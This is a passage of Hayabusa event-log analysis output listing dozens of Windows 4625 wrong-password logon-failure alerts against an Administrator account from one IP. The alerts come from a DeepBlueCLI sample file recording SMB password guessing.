Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
